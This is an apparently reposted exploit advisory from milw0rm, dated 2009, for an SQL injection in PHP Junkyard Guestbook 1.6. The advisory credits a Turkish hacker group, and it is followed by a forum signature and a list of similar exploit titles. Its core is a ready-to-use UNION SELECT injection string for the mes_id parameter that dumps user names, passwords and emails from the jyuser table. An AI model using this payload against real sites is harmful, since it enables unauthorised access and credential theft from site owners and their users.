- Code:
##PHP junkyard Guestbook v1.6 (mes_id) Sql Injection Vuln.
#######################################################################
#######################################################################
##Yazar: Bgh7
##
##Turk Bilisim Gucleri / Ihlilal Hatti
##
##ByBgh7[a]Msn.Com
##
##Bgh7.Blogspot.Com
##
##Bug: Sql Injection
##
##İndir/Download: http://www.phpjunkyard.com/php-guestbook-script.php
##
##Not: $20.00 USD
#######################################################################
#######################################################################
Sql: site/guestbook.php?mes_id=-99999 UNION SELECT 0,1,2,concat_ws(user,0x3a,pass,0x3a,mail),4,5,6,7,8,9,10,11,12 FROM jyuser--
#######################################################################
#######################################################################
Thanks: m3rcil3sS & milw0rm
# milw0rm.com [2009-07-17]
GBook 1.6 (mes_id) Remote SQL Injection Vulnerability
Foxi- Admin
- Posts : 92
Reputation : -1
Join date : 2009-07-08
» GLinks 2.1 (cat) Remote Blind SQL Injection Vulnerability
» phportal v1 (topicler.php id) Remote SQL Injection Vulnerability
» PHP Live! 3.2.1/2 (x) Remote Blind SQL Injection Vulnerability
» PHP Live! <= 3.2.2 (questid) Remote SQL Injection Vulnerability
» PHP Melody 1.5.3 Remote File Upload Injection Vulnerability
» phportal v1 (topicler.php id) Remote SQL Injection Vulnerability
» PHP Live! 3.2.1/2 (x) Remote Blind SQL Injection Vulnerability
» PHP Live! <= 3.2.2 (questid) Remote SQL Injection Vulnerability
» PHP Melody 1.5.3 Remote File Upload Injection Vulnerability